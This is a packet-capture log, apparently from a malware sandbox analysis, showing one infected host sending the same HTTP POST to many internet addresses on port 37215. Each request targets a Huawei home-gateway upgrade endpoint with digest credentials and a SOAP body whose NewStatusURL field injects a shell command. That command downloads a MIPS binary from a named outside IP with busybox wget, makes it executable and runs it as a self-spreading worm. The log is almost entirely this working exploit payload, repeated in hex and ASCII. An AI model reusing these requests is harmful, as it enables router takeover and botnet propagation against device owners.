                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1707192.168.2.2354428197.84.90.5937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536696911 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1708192.168.2.2344858197.34.217.2237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536704063 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1709192.168.2.2359932157.125.72.23537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536717892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1710192.168.2.235678441.182.140.7937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536725044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1711192.168.2.2353536197.174.221.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536739111 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1712192.168.2.235881292.59.188.8037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536748886 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1713192.168.2.2345592157.120.111.15537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536756039 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1714192.168.2.2358202197.57.31.4437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536762953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1715192.168.2.2339468157.190.6.24137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536775112 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1716192.168.2.2357622149.140.38.20637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536782026 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 